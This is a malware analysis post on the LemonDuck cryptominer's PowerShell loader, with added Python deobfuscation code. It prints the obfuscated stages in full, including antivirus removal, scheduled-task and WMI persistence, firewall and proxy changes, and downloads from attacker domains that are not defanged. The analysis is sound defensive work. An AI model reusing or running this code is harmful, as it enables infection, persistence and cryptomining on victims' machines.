
Malware Analysis:Lemon Duck CryptoMiner (mail.jsp) : Part I

Today we will be analyzing a malware named LemonDuck, which is a cryptominer. We will perform this analysis step by step and try to uncover what this malware does.

You can find resources related to the malware we will analyze in this GitHub repository.

⚠️ Any domains/URLs/IPs or scripts discovered while analyzing this malware are malicious. I defanged these URLs to prevent any accidental click. Don’t try to visit these domains or run these scripts on your host machine; always use a sandboxed VM to perform experiments.

Stage 0

The LemonDuck malware has various phases and stages, and for them it uses different scripts such as mail.jsp, 7p.php, report.jsp and a.jsp.

We have the malicious script mail.jsp with us 👇🏻. This script usually arrives with a phishing email and a .doc file; when the victim opens the document, this script executes.

IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('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'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

This looks like an encoded script. Let’s decode it and see what it does.
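As an added example (not code from the post or from the malware), the decoding step that the one-liner performs can be reproduced in Python without executing anything: split the hex string into byte pairs, inflate the bytes as raw DEFLATE, and read the result as ASCII. The real hex blob is not reproduced on this page, so the sample loader below is constructed by compressing a harmless script into the same loader shape; the function names are mine.

```python
import re
import zlib

def extract_hex_from_loader(one_liner: str) -> str:
    """Pull the quoted hex string out of the IEX/DeflateStream one-liner."""
    m = re.search(r"MemoryStream \(,\$\('([0-9A-Fa-f]+)'-split", one_liner)
    if not m:
        raise ValueError("loader pattern not found")
    return m.group(1)

def decode_deflate_hex(hex_blob: str) -> str:
    """Reproduce the loader's decoding in Python.

    The loader splits the string into two-character groups (-split '(..)'),
    converts each group from hex to a byte ([convert]::ToUInt32($_,16)),
    reads the bytes through a DeflateStream in Decompress mode and decodes
    the result as ASCII. DeflateStream is raw DEFLATE with no zlib header,
    which is what wbits=-15 selects in zlib.
    """
    pairs = re.findall(r"..", hex_blob)
    raw = bytes(int(pair, 16) for pair in pairs)
    return zlib.decompress(raw, -15).decode("ascii")

def decode_loader(one_liner: str) -> str:
    """Return the script the one-liner would hand to IEX, without running it."""
    return decode_deflate_hex(extract_hex_from_loader(one_liner))

def encode_deflate_hex(script: str) -> str:
    """Inverse of decode_deflate_hex; used only to construct a test sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return (comp.compress(script.encode("ascii")) + comp.flush()).hex()

# Constructed sample: a harmless script wrapped in the same loader shape as mail.jsp.
SAMPLE_SCRIPT = "Write-Output 'stage 1 placeholder'"
SAMPLE_LOADER = (
    "IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
    "($(New-Object IO.MemoryStream (,$('" + encode_deflate_hex(SAMPLE_SCRIPT)
    + "'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), "
    "[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
)

if __name__ == "__main__":
    print(decode_loader(SAMPLE_LOADER))
```

Decoding this way keeps the next stage as text for inspection; the `IEX` at the front of the one-liner is the only thing that turns it into execution, which is why the analysis strips it rather than running the loader.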

Stage 1

After decoding the script we get:

$LW7eF=  ")'X'+]31[DillEhs$+]1[dilLEHs$ (. |)29]rAHc[]GNirtS[,)15]rAHc[+65]rAHc[+401]rAHc[((EcalPer.)'$','0N9'(EcalPer.)93]rAHc[]GNirtS[,)401]rAHc[+201]rAHc[+311]rAHc[((EcalPer.)'

 ) '+')43]'+'rahC[]gNIrTS[,)97]rahC[+301]rahC[+211]rahC[((EcalPeR.)69]rahC[]gNIrTS[,)78]rahC[+111]rahC[+09]rahC[((EcalPeR.)hfq38hhfq,)121]rahC['+'+47]rahC[+021]rahC['+'((EcalPeR.)421]'+'rahC[]gNIrTS[,hfq9G'+'fhfq(EcalPeR.)93'+']rahC[]gNIrTS[,)27]rahC[+96'+']rahC[+201]rahC[((EcalPeR.)hfq0N9hfq,)94]rahC[+811]rahC[+57]rahC[((EcalPeR.)hfqF/ astR nt/ eteled/ sksathfq+hfqhcs

F/ 1astR nt/ eteled/ sksathcs'+'

F/ 2ashfq+hfqtR nhfq+hfqt/ eteled/ sksathcs


kcolb=noithfq+hfqca 531=trophfq+hfqlhfq+hfqacol pct=locotorp ni=rid Ogp531ynedOgp=e'+'man elur hfq+hf'+'qdda llawerif llawerifvda hsten

kc'+'olb=noitca 544=troplacolhfq+hfq pct=lohfq+hfqcotorp ni=rid Ogp544ynedO'+'gp='+'hfq+hfqema'+'n elur dda llawerif llawerifvda hsten

35=troptcennoc 1.1.1.1=sserddatcennoc 92556=tropnetsil 4vot4v dda yxorptrop ecafretni exe.hsten'+'
hfq+hfq
dSNDhfq+hfqS 92556 pct hfq+hfqgninepotrop dda llawerif'+' exehfq+hfq.hsten c/ ex'+'e.dmc

}
hfq+hfq
ecroF??? 1 eulaV- DROWD epyT- hfq+hfqnoisserpmoCelbasiD OgpsretemaraPyJxrevreSnamnaLyJxsecivreSyJxteSlortno'+'CtnerruCyJhfq+hfqxMETSYSyJx:MLKHOgp htaP- yt'+'reporPhfq+hfqmetI-teS

}
hfq+hfq
5 peels-trats '+'

})}Ogpdmcimw1vK c- llehhfq+hfqsrewop c/Ogp=etalpmeTeniLdnammoC;Ogpexe.dmcyJx23mets'+'ysyJ'+'xswodnhfq+hfqiwyJx:cOgp=hhfq+hfq'+'taPelbatucexE;e'+'maNeht1'+'vK+OgpcOgp=emaN{@ st'+'nemugrA- OgpnoitpircsbusyJxtoorOgp ecapsemaN- re'+'musnoCtne'+'vEeniLdnammoC ssalC- ecnatsnh'+'fq+hf'+'qIimW-teS(=remusnoC;)pohfq+hfqtS noitcArorrE- };OgpHEfmetsyS_SOfreP_ataDdehfq+hfqttamroFfreP_23niWHEf ASI ec'+'natsnIteg'+'raT EREHW 0063 NIHTIW tnev'+'En'+'oitahfq+hfqcifid'+'oMecnatsnI__ MORF '+'* TCELhfq+hfqESOgp=yreuQhfq+hfq;OgpLQWOgp=egaugna'+'Lhfq+hfqyrehfq+'+'hfquQ;Ogp2vmicyJx'+'toorOgp=ecapSemaNtnevE;emaNeht1vK+OgpfOgp=emaN{@ stnhfq+hfqemug'+'r'+'A- Ogphfq+hfqnoitpircsbusyJxtoorOgp hfq+hfqecapSemaN- retl'+'iFtnevE__ ssalC- ecnatsnIim'+'W-teS(=retliF{@ stnemugrA- OgpnoitpircsbusyJxtoorOgp ecaphfq+hfqsemaN- gnidniBremhfq+hfqusnoCoTr'+'ethfq+hfqliF__ ssalC-hfq+hfq'+' ecnatsnIimW-teS

)HEfpsj.aaHEf,HEhfq+hfqfpsj.aHEf(ecalper.))5(gnirtsbus.u1vK,HEf2UHEf(ecalper'+'.))5,0(gnirtsbus.uhfq+hfq1vK,HEf1UHEf(ecalper.spmt1v'+'K=dmcimw1vK

naRteg=e'+'maNeht1vK
hfq+hfq
{)su1vK nhfq+hfqi u1vK(hcaerof

hfq+hfqpotS noitcArorrE- };OgpHEfmetsyS_'+'SOfreP_ataDd'+'ettamhfq+hfqroFfrhfq+hfqeP_23niWHEf A'+'SI ecnatsnItegraT EREHhfq+hfqW 0063 '+'NIHTI'+'W tne'+'vEnoitacifidoMecnhfq+'+'hfqatsnI__ MORF * TCELESOgp=yre'+'uQ;Ogphf'+'q+hfqLQWOgp=ega'+'ugn'+'aLyreuQ;Ogp2vmicyJxtoorOgp=ecapSemaNtnevE;OgpllabkcalbOgp=emaN{@ stnemugrA- OgpnoitpircsbusyJxtoorOgp ecapSemaN- retliFtnevE__ ssalC- ecnatsnIimW-teS

{)1tiod1vKhfq+hfq ton-(fi

'+'hfq+hf'+'q}{hcthfq+hfqac}

Og'+'pHhfq+hfqEfllabkcal'+'bHEf=emaNOgp retlifhfq+hfq- HEfnoitpircsbusyJxtoorHEf ecapS'+'emaN- retliFtn'+'evE__ ssalChfq+hfq- tcejbOIMhfq+hfqW-teG=1thfq+hfqiod1hfq+h'+'fqvhfq+hfqK

{y'+'rt


}

}

5 peels-trats

Ogpnt1vKyJxfnthfq+hfq1hfq+hfqv'+'KOgp nt/ nhfq+'+'hfqur/ sksathchfq+hfqs

1 peels-thfq+hfqrats

}

}

}{hct'+'ac}

}

lluhfq+hfqn-tuo9Gf)llun1vK '+'hfq+hfq,0 ,llun1vK ,llun1vK ,4 ,)))5(gnirtsbus.u1vK,HEhfq+h'+'fqf2UHEf('+'ecalper.))5,0(gnirtsbus.u1vK,HEf1UHEf(ecalper.sphfq+hfqmt1vK,OgpDMC_SPOgp(hfq+hfqecalper.lmX.ksat1vK ,ehfq+hfqmaN.ksat1vK(ksaTretsigeR.redlhfq+hfqof'+'1vK

	{))OgpDMC_SPOgp(sniatnoC.stnemugrA.noihfq+'+'hfqtca1vK(fi

{yrt			hfq+hfq	hfq+hfq

{ )hfq+hfqsnoitcA.noitinifeD.kshfq+hfqat1vK ni noitcahfq+hfq1vK( hcaerof

{)metiksat1vK ni k'+'sat1vK(hcaerof		hfq+hfq

)1(sksahfq+hfqTteG.redlof1vK=hfq+hfqmetiksat1vK

)Ogpfnt1vKyJxOgp(re'+'dloFtehfq+hfqG.vrsts1vK=redhfq+hfqlof1vK

1 peels-trats

}

OgpDMC_SP c-hfq+h'+'fq neddih w- llehsrewhfq+hfq'+'opOgp rt/ F/ '+'Ogpnt1vKyJxfnt1vKhfq+hfqOgp nt/ 06 om/hfq+hfq ETUNIM cs/ etaerc/ sksathcs			hfq+hfq

{ esle }

OgpDMC_hfq+hfqSP c'+'- llehsrewopOgp rt/ F/ Ogpnt1vKyJxfnt1vKOgphfq+hfq nt/ 06 om/ ETUNIM cs/ '+'metsys ur/ etaerc/ sksathc'+'s

{)as1v'+'K(fi

naRteg'+' = nt1vK

}}naRt'+'eg=fnt1vK{esle})naRteg(+Hhfq+hfqEfyJxswodniWyJxhfq+hfqtfoSorciM'+'HEf=fnt1vK{)as1vK(fi'+'{)2 qe- 3%hf'+'q+hfqi1vK(fi

}naRteghfq+hfq=fnt1vK{)1 qe- 3%i1vK(fihfq+hfq

}HEfHEf=h'+'fq+hfqfnt1vK{)0 qe- 3%i1vK(fi	hfq+hfq

)u1vK,su1vK(hfq+hfqfOxe'+'dnI::]yarra[ = i1vK

{)su1vK ni u1vK(hcahfq+hfq'+'erof

}

OgpllabkcalbOgp'+' rt/ F/ llabkcalb nt/ 021 om'+'/ ETUNIM cs/ etaerc/ sksathcs

{ esle }

OgpllabkcalbOgphfq+hfq rt/ F/ llabkcalb nt/ 0'+'21 om/ ETUNIM cs/ '+'metsys ur/ etaerchfq+hfq/ h'+'fq+hfqsks'+'athcs

{)as1vK(fi

{)tiod1vK ton-(fi

}{hctac}

)OgpllabkcalbOgp(ksaTteG.)OgpyJxOgp(redloFteG.vrsts1vK=tiod1vK

{yrt

)(tcennoC.vrsts1vK

ecivreS.eludehcS thfq+hfqcejbOmoC- tcejbO-weN = vrsts1vK

)HE'+'fmoc.9u3bb.tHEf,HEfmoc.9rekz.'+'tHEf,HEfmoc.0'+'r3zz.tHEf(@=su1vK

}))6%)modnaR-teG(+6( tnuoC- modnaR-teG9Gf)221..79+09..56+75..84(]][rahc[(nioj- nruterhfq+h'+'fq{)(naRteg noi'+'tcnuf

)Ogprotarhfq+hfqtsinimdAOgp ]eloRnIthfq+hfqliuBswodniW.lapicnirP.ytiruceS[(eloRnIsI.)hfq+hfq)(tnerruCteG::]ytitnedIswodniW.lapicnirP.'+'ytiruceS[]lapicnirPs'+'wodniW.lapichfq+hfqnirP.ytiruceShfq+hfq[(=as1vK
hfq+hfq
HEf)lru1vK(a;)HEfHEf*HEfHEfnioj-))modnar(hfq+hfq,DIUU.)thfq+hfqcudorPmetsySretupmoC_23niW tcejboimw-teg(,EMANREShfq+hfqU:vne1vK,EMANRETUPMOC:vne1hfq+hfqvK(@(+HEfHEf?HEf+v1vK+HEfpsj.a/HEfHEf+HEfHEf2U'+'HEfHEf+HEfHEf1UHEfHEf+HEfHEf//:ptthHEfHEhfq+hfqf=lru1vK}}})b1vK]][rahc[nioj-(xeWoZ'+'I{)hfq+hfq)))]171..0[d1vK]]hfq+hfq[rahc[(nioj-(gnirtS46esaBmorhfq+hfqF::]trehfq+hfqvhfq+hfqnhfq+hfqoc[,)redivorPehfq'+'+h'+'fqcivreSotpyrC1AHS.yhhfq+hfqpargo'+'tpyrC'+'.ytihfq+hfqruchfq+hfqeS tcejh'+'fq+hfqbO-weN(,b1vK(ataDyfirev.r1vK(fi;)p1vK(sretemaraPhfq+hfqtrophfq+hfqmI.r'+'1vK;redivorPecivreSotpyrCASR.yhpargotpyrC.y'+'tiruceS tcejbO-weN=r1vK;10x0,00x0,10x0=tnenopxE.p1vK;)HEfHEf=01aHdLOqfprhfq+hfq7R6YIef1j1vcQUpL2/zlbjpCLDjb58M0C5YluqWknCUeNLh4feqi'+'4Rzxn3cASZ8cwkR0r03mugLbuLp818LicDW0RY/T'+'m2r3K7mlHYIcitzTzv2NN3Mw9IFPj4krWf26VtHbuNnmTN3/'+'v8vgdmpXB1GvXu71oWm2Hhfq+hfqEfHEf(gnirtShfq+hfq46esaBmorF::]trhfq+hf'+'qevnhfq+hfqoc[=shfq+hfqulhfq+hfqudohfq+hf'+'qM.p1vK;srehfq+hfqtemaraPASR.yh'+'pargotpyrC.yhfq+hfqtiruceS tcejbO-weN=p1vK;]c1vK..371[d1vK=b1vK{)371 tg'+'- c1vKhfq+hfq('+'fi;tnuoc.d1vK=c1'+'vK;))(dneotdhfq+hfqaer.)))(maertsesnopserteg.)(hfq+hfqesnopserteg.)u1vK(etaerc::]tseuqerbew.tehfq+hf'+'qn[(redaeRm'+'aertS.'+'O'+'Ihfq+hfq tcejbo-wenhfq+hfq((setybtehfq+hfqg.8ftuhfq+hfq::]gnid'+'ocne.thfq+hfqxet[hfq+hfq'+'=d1vK{)u1vK(a noitcnufHEf=spmt1vK

)H'+'EfddMMyyyy_H'+'Ef tamroF- etaD-teG(+Ogpv1vK?Ogp=v1vhfq+hfqK

'+'tratseron/ sexobgsmsserhfq+hfqpphfq+hfqus/ tneli'+'syrev/ Ogpexe.000sninuyJxerawlaM-itnAyJxsetyberawla'+'MyJxhfq+hfq1~hfq+hf'+'qargorP'+'yJx:COgp c/ dmchfq+hfq

evitcarehfq+hfqtnion/ llatsninuhfq+hfq llhfq+hfqac OgpHEf%hfq+hfqytiruceS notroN%HEf ekil emanOgp erehw hfq+hfqtcudorp exe.cimw b/ trats c/ dmc

evitcaretnion/ llatsninu llac OgpHEhfq+hfqf%suriVitnA%hfq+hfqHEf'+' ekil emanO'+'gp erehw tcudorhfq+hfqp exe.cimw b/ trats c/ dmc

evitcaretn'+'ion/ llatsninu llac hfq+hfqOgpHEf%ytiruceS%HEf ekil emanOgp erehw tcudohfq+hfqrp exe.cimw b/ trats c/ dmc

evitcaretnion/ llatsninu llac OgpHEf%'+'pva%Hhfq+hfqEf ekil emanOgp erehw tcudorp exe.cimw b/ '+'trats c/ dmc

evitcaretnion/ '+'llathfq+hfqsninu llac OgpHEf%tsava%HEf ekil emhfq+hfqanOgp erehw tcudorp exe.cimw b/ trats c/ dmhfq+hfqc

ehfq+hfqvitcaretnionhfq+hfq/ llatsninu llac OgpHEf%%hfq+hfqyksrepsaK%%HEf ekil emanOgp erehw'+' tcudorp exe.cimw b/ trats c/ dmc
'+'
evitcarethfq+hfqnion/ llatsninu llac OgpHEf%tesE%HEf ekil emanOgp erehw tcudorp exe.cimw b/ trhfq+hfqats c/ dmchfq(( )hfqXhfq+]03[EmOHsP0N9+]12[EMOhSP0N9 ( . '(  "; .( $veRbosePrEfERENCe.TOStrIng()[1,3]+'X'-joIn'')(( Get-vARIabLE  lw7ef  ).valUe[-1..-( ( Get-vARIabLE  lw7ef  ).valUe.lenGTh )]-jOiN'')

This looks like gibberish, but the last line contains something that looks like valid PowerShell: ( $veRbosePrEfERENCe.TOStrIng()[1,3]+'X'-joIn''). $VerbosePreference defaults to SilentlyContinue, so picking characters 1 and 3 of it and appending 'X' yields ieX, a very sneaky way of spelling IEX (Invoke-Expression) without the cmdlet name ever appearing in the script; when I run the same expression in my PowerShell instance I get ieX.

After that we have (( Get-vARIabLE lw7ef ).valUe[-1..-( ( Get-vARIabLE lw7ef ).valUe.lenGTh )]-jOiN''), which simply takes the variable lw7ef, indexes it from the last character back to the first and joins the result: in other words, it reverses the string before handing it to IEX.

So let’s try to deobfuscate the script.

Stage 2

The payload we obtained is:

(' . ( 9N0PShOME[21]+9N0PsHOmE[30]+qfhXqfh) ((qfhcmd /c staqfh+qfhrt /b wmic.exe product where pgOname like fEH%Eset%fEHpgO call uninstall /noinqfh+qfhteractive
'+'
cmd /c start /b wmic.exe product '+'where pgOname like fEH%%Kasperskyqfh+qfh%%fEHpgO call uninstall /qfh+qfhnointeractivqfh+qfhe

cqfh+qfhmd /c start /b wmic.exe product where pgOnaqfh+qfhme like fEH%avast%fEHpgO call uninsqfh+qfhtall'+' /nointeractive

cmd /c start'+' /b wmic.exe product where pgOname like fEqfh+qfhH%avp'+'%fEHpgO call uninstall /nointeractive

cmd /c start /b wmic.exe prqfh+qfhoduct where pgOname like fEH%Security%fEHpgOqfh+qfh call uninstall /noi'+'nteractive

cmd /c start /b wmic.exe pqfh+qfhroduct where pg'+'Oname like '+'fEHqfh+qfh%AntiVirus%fqfh+qfhEHpgO call uninstall /nointeractive

cmd /c start /b wmic.exe productqfh+qfh where pgOname like fEH%Norton Securityqfh+qfh%fEHpgO caqfh+qfhll qfh+qfhuninstall /nointqfh+qfheractive

qfh+qfhcmd /c pgOC:xJy'+'Prograq'+'fh+qfh~1qfh+qfhxJyM'+'alwarebytesxJyAnti-MalwarexJyunins000.exepgO /verys'+'ilent /suqfh+qfhppqfh+qfhressmsgboxes /norestart'+'

Kqfh+qfhv1v=pgO?Kv1vpgO+(Get-Date -Format fE'+'H_yyyyMMddfE'+'H)

Kv1tmps=fEHfunction a(Kv1u){Kv1d='+'qfh+qfh[texqfh+qfht.enco'+'ding]::qfh+qfhutf8.gqfh+qfhetbytes((qfh+qfhnew-object qfh+qfhI'+'O'+'.Strea'+'mReader([nq'+'fh+qfhet.webrequest]::create(Kv1u).getresponseqfh+qfh().getresponsestream())).reaqfh+qfhdtoend());Kv'+'1c=Kv1d.count;if'+'(qfh+qfhKv1c -'+'gt 173){Kv1b=Kv1d[173..Kv1c];Kv1p=New-Object Securitqfh+qfhy.Cryptograp'+'hy.RSAParametqfh+qfhers;Kv1p.Mq'+'fh+qfhoduqfh+qfhluqfh+qfhs=[coqfh+qfhnveq'+'fh+qfhrt]::FromBase64qfh+qfhString(fEHfEqfh+qfhH2mWo17uXvG1BXpmdgv8v'+'/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2m'+'T/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4'+'iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7qfh+qfhrpfqOLdHa10=fEHfEH);Kv1p.Exponent=0x01,0x00,0x01;Kv1r=New-Object Securit'+'y.Cryptography.RSACryptoServiceProvider;Kv1'+'r.Imqfh+qfhportqfh+qfhParameters(Kv1p);if(Kv1r.verifyData(Kv1b,(New-Obqfh+qf'+'hject Seqfh+qfhcurqfh+qfhity.'+'Crypt'+'ograpqfh+qfhhy.SHA1CryptoServicqf'+'h+'+'qfheProvider),[coqfh+qfhnqfh+qfhvqfh+qfhert]::Fqfh+qfhromBase64String(-join([char[qfh+qfh]]Kv1d[0..171])))qfh+qfh){I'+'ZoWex(-join[char[]]Kv1b)}}}Kv1url=fqfh+qfhEHfEHhttp://fEHfEH+fEHfEHU1fEHfEH+fEHfEH'+'U2fEHfEH+fEHfEH/a.jspfEH+Kv1v+fEH?fEHfEH+(@(Kvqfh+qfh1env:COMPUTERNAME,Kv1env:Uqfh+qfhSERNAME,(get-wmiobject Win32_ComputerSystemProducqfh+qfht).UUID,qfh+qfh(random))-joinfEHfEH*fEHfEH);a(Kv1url)fEH
qfh+qfh
Kv1sa=([qfh+qfhSecurity.Prinqfh+qfhcipal.Window'+'sPrincipal][Security'+'.Principal.WindowsIdentity]::GetCurrent()qfh+qfh).IsInRole([Security.Principal.WindowsBuilqfh+qfhtInRole] pgOAdministqfh+qfhratorpgO)

funct'+'ion getRan(){qf'+'h+qfhreturn -join([char[]](48..57+65..90+97..122)fG9Get-Random -Count (6+(Get-Random)%6))}

Kv1us=@(fEHt.zz3r'+'0.comfEH,fEHt'+'.zker9.comfEH,fEHt.bb3u9.comf'+'EH)

Kv1stsrv = New-Object -ComObjecqfh+qfht Schedule.Service

Kv1stsrv.Connect()

try{

Kv1doit=Kv1stsrv.GetFolder(pgOxJypgO).GetTask(pgOblackballpgO)

}catch{}

if(-not Kv1doit){

if(Kv1sa){

schta'+'sksqfh+qf'+'h /qfh+qfhcreate /ru system'+' /sc MINUTE /mo 12'+'0 /tn blackball /F /tr qfh+qfhpgOblackballpgO

} else {

schtasks /create /sc MINUTE /'+'mo 120 /tn blackball /F /tr '+'pgOblackballpgO

}

fore'+'qfh+qfhach(Kv1u in Kv1us){

Kv1i = [array]::Ind'+'exOfqfh+qfh(Kv1us,Kv1u)

qfh+qfhif(Kv1i%3 -eq 0){Kv1tnfqfh+qf'+'h=fEHfEH}

qfh+qfhif(Kv1i%3 -eq 1){Kv1tnf=qfh+qfhgetRan}

if(Kv1iqfh+q'+'fh%3 -eq 2){'+'if(Kv1sa){Kv1tnf=fEH'+'MicroSoftqfh+qfhxJyWindowsxJyfEqfh+qfhH+(getRan)}else{Kv1tnf=ge'+'tRan}}

Kv1tn = '+'getRan

if(K'+'v1sa){

s'+'chtasks /create /ru system'+' /sc MINUTE /mo 60 /tn qfh+qfhpgOKv1tnfxJyKv1tnpgO /F /tr pgOpowershell -'+'c PSqfh+qfh_CMDpgO

} else {

qfh+qfhschtasks /create /sc MINUTE qfh+qfh/mo 60 /tn pgOqfh+qfhKv1tnfxJyKv1tnpgO'+' /F /tr pgOpo'+'qfh+qfhwershell -w hidden qf'+'h+qfh-c PS_CMDpgO

}

start-sleep 1

Kv1folqfh+qfhder=Kv1stsrv.Gqfh+qfhetFold'+'er(pgOxJyKv1tnfpgO)

Kv1taskitemqfh+qfh=Kv1folder.GetTqfh+qfhasks(1)

qfh+qfhforeach(Kv1tas'+'k in Kv1taskitem){

foreach (Kv1qfh+qfhaction in Kv1taqfh+qfhsk.Definition.Actionsqfh+qfh) {

qfh+qfhqfh+qfhtry{

if(Kv1actqfh'+'+qfhion.Arguments.Contains(pgOPS_CMDpgO)){

Kv1'+'foqfh+qfhlder.RegisterTask(Kv1task.Namqfh+qfhe, Kv1task.Xml.replaceqfh+qfh(pgOPS_CMDpgO,Kv1tmqfh+qfhps.replace(fEHU1fEH,Kv1u.substring(0,5)).replace'+'(fEHU2fqf'+'h+qfhEH,Kv1u.substring(5))), 4, Kv1null, Kv1null, 0,qfh+qfh'+' Kv1null)fG9out-nqfh+qfhull

}

}ca'+'tch{}

}

}

starqfh+qfht-sleep 1

sqfh+qfhchtasks /ruqfh'+'+qfhn /tn pgOK'+'vqfh+qfh1qfh+qfhtnfxJyKv1tnpgO

start-sleep 5

}

}


tr'+'y{

Kqfh+qfhvqf'+'h+qfh1doiqfh+qfht1=Get-Wqfh+qfhMIObject -qfh+qfhClass __Eve'+'ntFilter -Name'+'Space fEHrootxJysubscriptionfEH -qfh+qfhfilter pgOName=fEHb'+'lackballfEqfh+qfhHp'+'gO

}caqfh+qfhtch{}q'+'fh+qfh'+'

if(-not qfh+qfhKv1doit1){

Set-WmiInstance -Class __EventFilter -NameSpace pgOrootxJysubscriptionpgO -Arguments @{Name=pgOblackballpgO;EventNameSpace=pgOrootxJycimv2pgO;QueryLa'+'ngu'+'age=pgOWQLqfh+q'+'fhpgO;Qu'+'ery=pgOSELECT * FROM __Instaqfh'+'+qfhnceModificationEv'+'ent W'+'ITHIN'+' 3600 Wqfh+qfhHERE TargetInstance IS'+'A fEHWin32_Peqfh+qfhrfForqfh+qfhmatte'+'dData_PerfOS'+'_SystemfEHpgO;} -ErrorAction Stopqfh+qfh

foreach(Kv1u iqfh+qfhn Kv1us){
qfh+qfh
Kv1theNam'+'e=getRan

Kv1wmicmd=K'+'v1tmps.replace(fEHU1fEH,Kv1qfh+qfhu.substring(0,5)).'+'replace(fEHU2fEH,Kv1u.substring(5)).replace(fEHa.jspfqfh+qfhEH,fEHaa.jspfEH)

Set-WmiInstance '+'qfh+qfh-Class __Filqfh+qfhte'+'rToConsuqfh+qfhmerBinding -Namesqfh+qfhpace pgOrootxJysubscriptionpgO -Arguments @{Filter=(Set-W'+'miInstance -Class __EventFi'+'lter -NameSpaceqfh+qfh pgOrootxJysubscriptionqfh+qfhpgO -A'+'r'+'gumeqfh+qfhnts @{Name=pgOfpgO+Kv1theName;EventNameSpace=pgOroot'+'xJycimv2pgO;Quqfh'+'+qfheryqfh+qfhL'+'anguage=pgOWQLpgO;qfh+qfhQuery=pgOSEqfh+qfhLECT *'+' FROM __InstanceMo'+'dificqfh+qfhatio'+'nE'+'vent WITHIN 3600 WHERE Tar'+'getInstan'+'ce ISA fEHWin32_PerfFormattqfh+qfhedData_PerfOS_SystemfEHpgO;} -ErrorAction Stqfh+qfhop);Consumer=(Set-WmiIq'+'fh+qf'+'hnstance -Class CommandLineEv'+'entConsum'+'er -Namespace pgOrootxJysubscriptionpgO -Argumen'+'ts @{Name=pgOcpgO+Kv'+'1theNam'+'e;ExecutablePat'+'qfh+qfhh=pgOc:xJywiqfh+qfhndowsx'+'Jysy'+'stem32xJycmd.exepgO;CommandLineTemplate=pgO/c powersqfh+qfhhell -c Kv1wmicmdpgO})}

'+' start-sleep 5
qfh+qfh
}

Set-Itemqfh+qfhProper'+'ty -Path pgOHKLM:xJySYSTEMxqfh+qfhJyCurrentC'+'ontrolSetxJyServicesxJyLanmanServerxJyParameterspgO DisableCompressionqfh+qfh -Type DWORD -Value 1 ???Force
qfh+qfh
}

cmd.e'+'xe /c netsh.qfh+qfhexe '+'firewall add portopeningqfh+qfh tcp 65529 Sqfh+qfhDNSd
qfh+qfh
'+'netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53

netsh advfirewall firewall add rule n'+'ameqfh+qfh'+'=pg'+'Odeny445pgO dir=in protocqfh+qfhol=tcp qfh+qfhlocalport=445 action=blo'+'ck

netsh advfirewall firewall addq'+'fh+qfh rule nam'+'e=pgOdeny135pgO dir=in protocol=tcp locaqfh+qfhlqfh+qfhport=135 acqfh+qfhtion=block


schtasks /delete /tqfh+qfhn Rtqfh+qfhsa2 /F

'+'schtasks /delete /tn Rtsa1 /F

schqfh+qfhtasks /delete /tn Rtsa /Fqfh).RePlacE(([Char]75+[Char]118+[Char]49),qfh9N0qfh).RePlacE(([Char]102+[Char]'+'69+[Char]72),[STrINg][Char]'+'39).RePlacE(qfhf'+'G9qfh,[STrINg][Char'+']124).RePlacE(('+'[Char]120+[Char]74+'+'[Char]121),qfhh83qfh).RePlacE(([Char]90+[Char]111+[Char]87),[STrINg][Char]96).RePlacE(([Char]112+[Char]103+[Char]79),[STrINg][Char'+']34)'+' )

').rePlacE(([cHAr]113+[cHAr]102+[cHAr]104),[StriNG][cHAr]39).rePlacE('9N0','$').rePlacE(([cHAr]104+[cHAr]56+[cHAr]51),[StriNG][cHAr]92)| .( $sHELlid[1]+$shElliD[13]+'X')

We got some familiar-looking code, but it is still obfuscated, so let’s deobfuscate the code again and clean it up a bit.
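Added example, not code from the post or from the malware: a small Python deobfuscator for the transformations described above, covering both the string reversal of Stage 1 and the '+' fragment joins and .Replace() chain of Stage 2 (the token values come from the [Char] arithmetic at the end of the Stage 2 blob), plus the three indirect IEX spellings this sample uses. The function names are mine; the sample lines are copied from the blobs above, and the variable defaults used for the IEX aliases are the ones a stock Windows PowerShell 5.1 install has.

```python
# Tokens the script's own .Replace() chain turns back into PowerShell syntax.
# The [Char] sums in the blob resolve to the literals on the right.
TOKEN_MAP = {
    "Kv1": "$",   # [Char]75+118+49  -> '9N0' -> '$'
    "fEH": "'",   # [Char]102+69+72  -> [Char]39
    "fG9": "|",   # [Char]124
    "xJy": "\\",  # [Char]120+74+121 -> 'h83' -> [Char]92
    "ZoW": "`",   # [Char]90+111+87  -> [Char]96
    "pgO": '"',   # [Char]112+103+79 -> [Char]34
    "9N0": "$",   # outer .rePlacE('9N0','$')
    "h83": "\\",  # outer .rePlacE(h83, [cHAr]92)
}

def clean_stage2(text: str) -> str:
    """Undo the Stage 2 string surgery and return readable PowerShell."""
    # The blob is a chain of single-quoted fragments glued with '+'; the glue
    # carries no content, so removing it is the same as concatenating.
    s = text.replace("'+'", "")
    # qfh is the encoded single quote ([cHAr]113+102+104). Once restored,
    # the qfh+qfh joins read as '+' as well and drop out the same way.
    s = s.replace("qfh", "'").replace("'+'", "")
    for token, plain in TOKEN_MAP.items():
        s = s.replace(token, plain)
    return s

def clean_stage1(text: str) -> str:
    """Stage 1 is Stage 2 written backwards (the loader reverses lw7ef)."""
    return clean_stage2(text[::-1])

def indexed_chars(value: str, indices) -> str:
    """Evaluate a $var[i]+$var[j] character pick the way PowerShell does."""
    return "".join(value[i] for i in indices)

# Default values (constructed here) of the variables the loaders index into.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"
SHELL_ID = "Microsoft.PowerShell"
VERBOSE_PREFERENCE = "SilentlyContinue"

def resolve_iex_aliases() -> dict:
    """The three indirect Invoke-Expression spellings used by this sample."""
    return {
        "$PSHOME[21]+$PSHOME[30]+'X'": indexed_chars(PSHOME, [21, 30]) + "X",
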